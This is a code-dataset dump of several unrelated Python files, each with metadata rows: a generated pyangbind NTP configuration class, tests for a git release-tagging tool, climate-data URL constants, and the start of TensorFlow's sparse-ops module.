| 43.625 | 120 | 0.733115 | 302 | 2,443 | 5.596026 | 0.15894 | 0.092308 | 0.123077 | 0.161538 | 0.813609 | 0.813609 | 0.794083 | 0.762722 | 0.762722 | 0.732544 | 0 | 0.087021 | 0.167417 | 2,443 | 55 | 121 | 44.418182 | 0.743854 | 0.008596 | 0 | 0.348837 | 0 | 0 | 0.523967 | 0.503306 | 0 | 0 | 0 | 0 | 0.139535 | 1 | 0.093023 | false | 0 | 0.232558 | 0 | 0.348837 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0790354b70f79804b7c1391fb9dd7e87f11cc3bf | 17,929 | py | Python | pybind/nos/v7_1_0/ntp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/nos/v7_1_0/ntp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/nos/v7_1_0/ntp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import server
import authentication_key
class ntp(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module brocade-ntp - based on the path /ntp. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.

  NOTE(review): generated code -- prefer regenerating from the YANG model
  over hand-editing.  Comments below are for readers only.
  """
  # Restrict instances to the pyangbind bookkeeping slots plus the three
  # YANG members (double-underscore names are mangled to _ntp__server etc.).
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__server','__authentication_key','__source_ip',)

  _yang_name = 'ntp'
  _rest_name = 'ntp'

  _pybind_generated_by = 'container'

  def __init__(self, *args, **kwargs):
    # Resolve the XPath helper used for path registration: an explicit
    # "path_helper" kwarg wins, then the parent's helper, else disabled.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False

    # Same resolution order for the extension-methods table.
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False

    # Default-construct the three members with their generated YANG metadata:
    # /ntp/authentication-key (list), /ntp/source-ip (leaf), /ntp/server (list).
    self.__authentication_key = YANGDynClass(base=YANGListType("keyid",authentication_key.authentication_key, yang_name="authentication-key", rest_name="authentication-key", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='keyid', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}), is_container='list', yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
    self.__source_ip = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'chassis-ip': {'value': 1}, u'mm-ip': {'value': 2}},), default=unicode("mm-ip"), is_leaf=True, yang_name="source-ip", rest_name="source-ip", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure the source ip to be used for NTP', u'cli-full-command': None, u'callpoint': u'ntp_srcip_cp'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='srcip_type', is_config=True)
    self.__server = YANGDynClass(base=YANGListType("ip use_vrf",server.server, yang_name="server", rest_name="server", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='ip use-vrf', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}), is_container='list', yang_name="server", rest_name="server", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)

    # Copy-constructor behaviour: one positional argument is treated as
    # another /ntp container whose changed elements are copied into self.
    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          # skip elements still at their default value
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)

  def _path(self):
    # YANG path of this node: parent path plus own name, or the absolute
    # path when this container has no parent.
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return [u'ntp']

  def _rest_path(self):
    # REST path mirrors _path() but uses rest names and skips nodes that
    # have none.
    if hasattr(self, "_parent"):
      if self._rest_name:
        return self._parent._rest_path()+[self._rest_name]
      else:
        return self._parent._rest_path()
    else:
      return [u'ntp']

  def _get_server(self):
    """
    Getter method for server, mapped from YANG variable /ntp/server (list)
    """
    return self.__server

  def _set_server(self, v, load=False):
    """
    Setter method for server, mapped from YANG variable /ntp/server (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_server is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_server() directly.
    """
    if hasattr(v, "_utype"):
      # unwrap a previously-wrapped value to its underlying type first
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("ip use_vrf",server.server, yang_name="server", rest_name="server", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='ip use-vrf', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}), is_container='list', yang_name="server", rest_name="server", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """server must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("ip use_vrf",server.server, yang_name="server", rest_name="server", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='ip use-vrf', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}), is_container='list', yang_name="server", rest_name="server", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)""",
        })

    self.__server = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_server(self):
    # Reset /ntp/server to its default-constructed (empty) list.
    self.__server = YANGDynClass(base=YANGListType("ip use_vrf",server.server, yang_name="server", rest_name="server", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='ip use-vrf', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}), is_container='list', yang_name="server", rest_name="server", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)


  def _get_authentication_key(self):
    """
    Getter method for authentication_key, mapped from YANG variable /ntp/authentication_key (list)
    """
    return self.__authentication_key

  def _set_authentication_key(self, v, load=False):
    """
    Setter method for authentication_key, mapped from YANG variable /ntp/authentication_key (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_authentication_key is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_authentication_key() directly.
    """
    if hasattr(v, "_utype"):
      # unwrap a previously-wrapped value to its underlying type first
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("keyid",authentication_key.authentication_key, yang_name="authentication-key", rest_name="authentication-key", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='keyid', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}), is_container='list', yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """authentication_key must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("keyid",authentication_key.authentication_key, yang_name="authentication-key", rest_name="authentication-key", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='keyid', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}), is_container='list', yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)""",
        })

    self.__authentication_key = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_authentication_key(self):
    # Reset /ntp/authentication-key to its default-constructed (empty) list.
    self.__authentication_key = YANGDynClass(base=YANGListType("keyid",authentication_key.authentication_key, yang_name="authentication-key", rest_name="authentication-key", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='keyid', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}), is_container='list', yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)


  def _get_source_ip(self):
    """
    Getter method for source_ip, mapped from YANG variable /ntp/source_ip (srcip_type)
    """
    return self.__source_ip

  def _set_source_ip(self, v, load=False):
    """
    Setter method for source_ip, mapped from YANG variable /ntp/source_ip (srcip_type)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_source_ip is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_source_ip() directly.
    """
    if hasattr(v, "_utype"):
      # unwrap a previously-wrapped value to its underlying type first
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'chassis-ip': {'value': 1}, u'mm-ip': {'value': 2}},), default=unicode("mm-ip"), is_leaf=True, yang_name="source-ip", rest_name="source-ip", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure the source ip to be used for NTP', u'cli-full-command': None, u'callpoint': u'ntp_srcip_cp'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='srcip_type', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """source_ip must be of a type compatible with srcip_type""",
          'defined-type': "brocade-ntp:srcip_type",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'chassis-ip': {'value': 1}, u'mm-ip': {'value': 2}},), default=unicode("mm-ip"), is_leaf=True, yang_name="source-ip", rest_name="source-ip", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure the source ip to be used for NTP', u'cli-full-command': None, u'callpoint': u'ntp_srcip_cp'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='srcip_type', is_config=True)""",
        })

    self.__source_ip = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_source_ip(self):
    # Reset /ntp/source-ip to its default ("mm-ip").
    self.__source_ip = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'chassis-ip': {'value': 1}, u'mm-ip': {'value': 2}},), default=unicode("mm-ip"), is_leaf=True, yang_name="source-ip", rest_name="source-ip", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure the source ip to be used for NTP', u'cli-full-command': None, u'callpoint': u'ntp_srcip_cp'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='srcip_type', is_config=True)

  # Public attribute access goes through property wrappers around the
  # generated getters/setters (__builtin__.property: Python 2 module).
  server = __builtin__.property(_get_server, _set_server)
  authentication_key = __builtin__.property(_get_authentication_key, _set_authentication_key)
  source_ip = __builtin__.property(_get_source_ip, _set_source_ip)

  # Element registry used by the copy-constructor path in __init__.
  _pyangbind_elements = {'server': server, 'authentication_key': authentication_key, 'source_ip': source_ip, }
| 91.94359 | 1,295 | 0.714429 | 2,601 | 17,929 | 4.74356 | 0.074971 | 0.03242 | 0.062247 | 0.038904 | 0.830929 | 0.807748 | 0.798347 | 0.791295 | 0.791295 | 0.783514 | 0 | 0.002952 | 0.130794 | 17,929 | 194 | 1,296 | 92.417526 | 0.788758 | 0.07909 | 0 | 0.415385 | 0 | 0.023077 | 0.439212 | 0.170866 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092308 | false | 0 | 0.076923 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
079a2b8d2bddffed4d3d6417f0ea3a73793a55d0 | 2,008 | py | Python | tests/test_initialize.py | binxio/git-release-tag | 1edf6e4401eaf4d900d0a6a1bca61ec56496d675 | [
"Apache-2.0"
] | 2 | 2020-03-18T11:59:56.000Z | 2022-03-29T10:53:32.000Z | tests/test_initialize.py | binxio/git-release-tag | 1edf6e4401eaf4d900d0a6a1bca61ec56496d675 | [
"Apache-2.0"
] | null | null | null | tests/test_initialize.py | binxio/git-release-tag | 1edf6e4401eaf4d900d0a6a1bca61ec56496d675 | [
"Apache-2.0"
] | null | null | null | import pytest
import os
import uuid
from git_release_tag.release_info import ReleaseInfo
def test_initialize_outside_a_workspace():
    """ReleaseInfo.initialize works on plain directories that are not inside
    a git work tree, and the written .release file reads back correctly.

    Fixes: removed the unused `ctx` local and renamed the loop variable so it
    no longer shadows the builtin `dir`.
    """
    # Unique scratch tree so concurrent/repeated runs do not collide.
    topdir = f"/tmp/git-release-tag/init/{uuid.uuid4()}"
    directories = [os.path.join(topdir, "a"), os.path.join(topdir, "b"), topdir]
    for directory in directories:
        os.makedirs(directory, exist_ok=True)
    for i, directory in enumerate(directories):
        ReleaseInfo.initialize(
            directory=directory,
            semver=f"0.{i}.0",
            base_tag=(os.path.basename(directory) + "-"),
            pre_tag_command="echo @@RELEASE@@ > release.txt",
            dry_run=False,
        )
        # Reading the directory back must reproduce what initialize wrote.
        info = ReleaseInfo(path=directory)
        assert info.pre_tag_command == "echo @@RELEASE@@ > release.txt"
        assert info.base_tag == os.path.basename(directory) + "-"
        assert info.semver == f"0.{i}.0"
        assert info.directory == directory
        assert info.path == os.path.join(directory, ".release")
        assert not info.is_inside_work_tree
def test_initialize_in_workspace():
    """ReleaseInfo.initialize works inside a freshly git-initialized tree and
    reports is_inside_work_tree for every initialized directory.

    Fixes: removed the unused `ctx` local and renamed the loop variable so it
    no longer shadows the builtin `dir`.
    """
    # Unique scratch tree so concurrent/repeated runs do not collide.
    topdir = f"/tmp/git-release-tag/init/{uuid.uuid4()}"
    directories = [os.path.join(topdir, "a"), os.path.join(topdir, "b"), topdir]
    for directory in directories:
        os.makedirs(directory, exist_ok=True)
    # Turn the top directory into a git work tree before initializing.
    repo = ReleaseInfo(path=topdir)
    repo.git_init()
    for i, directory in enumerate(directories):
        ReleaseInfo.initialize(
            directory=directory,
            semver=f"0.{i}.0",
            base_tag=(os.path.basename(directory) + "-"),
            pre_tag_command="echo @@RELEASE@@ > release.txt",
            dry_run=False,
        )
        # Reading the directory back must reproduce what initialize wrote.
        info = ReleaseInfo(path=directory)
        assert info.is_inside_work_tree
        assert info.pre_tag_command == "echo @@RELEASE@@ > release.txt"
        assert info.base_tag == os.path.basename(directory) + "-"
        assert info.semver == f"0.{i}.0"
        assert info.directory == directory
        assert info.path == os.path.join(directory, ".release")
| 37.886792 | 80 | 0.603088 | 263 | 2,008 | 4.471483 | 0.209125 | 0.093537 | 0.05102 | 0.054422 | 0.860544 | 0.829932 | 0.829932 | 0.829932 | 0.829932 | 0.829932 | 0 | 0.006601 | 0.245518 | 2,008 | 52 | 81 | 38.615385 | 0.769637 | 0 | 0 | 0.75 | 0 | 0 | 0.14243 | 0.039841 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.041667 | false | 0 | 0.083333 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ed2f89b1a3e0339302490c19f601cc005bb534e8 | 7,152 | py | Python | myIngrid/data_lib.py | wy2136/wython | 0eaa9db335d57052806ae956afe6a34705407628 | [
"MIT"
] | 1 | 2022-03-21T21:24:40.000Z | 2022-03-21T21:24:40.000Z | myIngrid/data_lib.py | wy2136/wython | 0eaa9db335d57052806ae956afe6a34705407628 | [
"MIT"
] | null | null | null | myIngrid/data_lib.py | wy2136/wython | 0eaa9db335d57052806ae956afe6a34705407628 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@author: yang
"""
from . import data_lib_iri
from .data_lib_iri import *
# ######## data paths on the Columbia (LDEO) data library.
# All datasets below live under the same OpenDAP root, so build the full
# URLs from these shared (private) prefixes instead of repeating them.
_BASE = 'http://strega.ldeo.columbia.edu:81/OTHER/.wyang/.strega/.home'
_SURF = _BASE + '/.ERAInterim/.Surface'
_DAILY = _BASE + '/.ERAInterim/.daily'

# climate index
mjo_phase = _BASE + '/.climate_index/.MJO_index.nc/.phase'
mjo_amplitude = _BASE + '/.climate_index/.MJO_index.nc/.amplitude'

# time series
itcz_states_daily = _BASE + '/.ITCZ_states/.itcz_daily.nc/.n'
itcz_states = itcz_states_daily
# BUGFIX: the 3-hourly URL previously had the scheme+host duplicated
# ('http://...edu:81http://...edu:81/...'), which is not a valid URL.
itcz_states_3hourly = _BASE + '/.ITCZ_states/.itcz_3hourly.nc/.n'

# surface
# monthly
qu_int_erai = _SURF + '/.qu.int.nc/.int_qu'
qv_int_erai = _SURF + '/.qv.int.nc/.int_qv'
sic_erai = _SURF + '/.sic.nc/.ci'
# daily ('.ydayanom' variants are anomalies w.r.t. day-of-year climatology)
hfls_daily_erai = _DAILY + '/.hfls.nc/.slhf'
hfls_daily_anom_erai = _DAILY + '/.hfls.ydayanom.nc/.slhf'
hfss_daily_erai = _DAILY + '/.hfss.nc/.sshf'
hfss_daily_anom_erai = _DAILY + '/.hfss.ydayanom.nc/.sshf'
pr_daily_erai = _DAILY + '/.prcp.daily.nc/.prcp'
pr_daily_anom_erai = _DAILY + '/.prcp.daily.ydayanom.nc/.prcp'
rlns_daily_erai = _DAILY + '/.rlns.nc/.str'
rlns_daily_anom_erai = _DAILY + '/.rlns.ydayanom.nc/.str'
rsns_daily_erai = _DAILY + '/.rsns.nc/.ssr'
rsns_daily_anom_erai = _DAILY + '/.rsns.ydayanom.nc/.ssr'
u10_daily_erai = _DAILY + '/.u10.daily.nc/.U10'
u10_daily_anom_erai = _DAILY + '/.u10.daily.ydayanom.nc/.U10'
v10_daily_erai = _DAILY + '/.v10.daily.nc/.V10'
v10_daily_anom_erai = _DAILY + '/.v10.daily.ydayanom.nc/.V10'
wind10_daily_erai = _DAILY + '/.wind10.daily.nc/.WIND10'
wind10_daily_anom_erai = _DAILY + '/.wind10.daily.ydayanom.nc/.WIND10'

# OLR
olr_daily = _BASE + '/.olr/.olr.day.mean.nc/.olr'
olr_daily_anom = _BASE + '/.olr/.olr.day.anom.nc/.olr'

# SST
oisst2 = _BASE + '/.sst/.oisst.nc/.sst'
oisst2_anom = _BASE + '/.sst/.oisst.ydayanom.nc/.sst'
oisst2_monanom = _BASE + '/.sst/.oisst.monanom.nc/.sst'

# pressure levels
div_daily_200mb_erai = _DAILY + '/.div.daily.200mb.nc/.D'
div_daily_anom_200mb_erai = _DAILY + '/.div.daily.ydayanom.200mb.nc/.D'
phi_daily_200mb_erai = _DAILY + '/.phi.daily.200mb.nc/.VP'
phi_daily_anom_200mb_erai = _DAILY + '/.phi.daily.ydayanom.200mb.nc/.VP'
phi_daily_850mb_erai = _DAILY + '/.phi.daily.850mb.nc/.VP'
phi_daily_anom_850mb_erai = _DAILY + '/.phi.daily.ydayanom.850mb.nc/.VP'
psi_daily_200mb_erai = _DAILY + '/.psi.daily.200mb.nc/.SF'
psi_daily_anom_200mb_erai = _DAILY + '/.psi.daily.ydayanom.200mb.nc/.SF'
psi_daily_850mb_erai = _DAILY + '/.psi.daily.850mb.nc/.SF'
psi_daily_anom_850mb_erai = _DAILY + '/.psi.daily.ydayanom.850mb.nc/.SF'
q_daily_850mb_erai = _DAILY + '/.q.daily.850mb.nc/.q'
q_daily_anom_850mb_erai = _DAILY + '/.q.daily.ydayanom.850mb.nc/.q'
qu_daily_850mb_erai = _DAILY + '/.qu.daily.850mb.nc/.qu'
qu_daily_anom_850mb_erai = _DAILY + '/.qu.daily.ydayanom.850mb.nc/.qu'
qv_daily_850mb_erai = _DAILY + '/.qv.daily.850mb.nc/.qv'
qv_daily_anom_850mb_erai = _DAILY + '/.qv.daily.ydayanom.850mb.nc/.qv'
u_daily_200mb_erai = _DAILY + '/.u.daily.200mb.nc/.U'
u_daily_anom_200mb_erai = _DAILY + '/.u.daily.ydayanom.200mb.nc/.U'
u_daily_850mb_erai = _DAILY + '/.u.daily.850mb.nc/.U'
u_daily_anom_850mb_erai = _DAILY + '/.u.daily.ydayanom.850mb.nc/.U'
v_daily_200mb_erai = _DAILY + '/.v.daily.200mb.nc/.V'
v_daily_anom_200mb_erai = _DAILY + '/.v.daily.ydayanom.200mb.nc/.V'
v_daily_850mb_erai = _DAILY + '/.v.daily.850mb.nc/.V'
v_daily_anom_850mb_erai = _DAILY + '/.v.daily.ydayanom.850mb.nc/.V'
zeta_daily_850mb_erai = _DAILY + '/.zeta.850mb.nc/.zeta'
zeta_daily_anom_850mb_erai = _DAILY + '/.zeta.ydayanom.850mb.nc/.zeta'
| 90.531646 | 152 | 0.756991 | 1,142 | 7,152 | 4.597198 | 0.071804 | 0.104762 | 0.188571 | 0.22 | 0.84419 | 0.819238 | 0.819238 | 0.819238 | 0.819238 | 0.819238 | 0 | 0.044425 | 0.030621 | 7,152 | 78 | 153 | 91.692308 | 0.712823 | 0.021113 | 0 | 0 | 0 | 0.947368 | 0.797735 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035088 | 0 | 0.035088 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
92f2517402c848774d550e1fdf1d543b010cef87 | 2,686 | py | Python | Lib/site-packages/tensorflow_core/_api/v2/sparse/__init__.py | caiyongji/py36-tf2.0rc | c5b4b364ba14214534228570e58ef96b1a8bb6dc | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/site-packages/tensorflow_core/_api/v2/sparse/__init__.py | caiyongji/py36-tf2.0rc | c5b4b364ba14214534228570e58ef96b1a8bb6dc | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | Lib/site-packages/tensorflow_core/_api/v2/sparse/__init__.py | caiyongji/py36-tf2.0rc | c5b4b364ba14214534228570e58ef96b1a8bb6dc | [
"CNRI-Python-GPL-Compatible"
] | null | null | null | # This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Sparse Tensor Representation.
See also `tf.SparseTensor`.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.framework.sparse_tensor import SparseTensor
from tensorflow.python.ops.array_ops import sparse_mask as mask
from tensorflow.python.ops.math_ops import sparse_segment_mean_v2 as segment_mean
from tensorflow.python.ops.math_ops import sparse_segment_sqrt_n_v2 as segment_sqrt_n
from tensorflow.python.ops.math_ops import sparse_segment_sum_v2 as segment_sum
from tensorflow.python.ops.sparse_ops import _sparse_cross as cross
from tensorflow.python.ops.sparse_ops import _sparse_cross_hashed as cross_hashed
from tensorflow.python.ops.sparse_ops import from_dense
from tensorflow.python.ops.sparse_ops import sparse_add_v2 as add
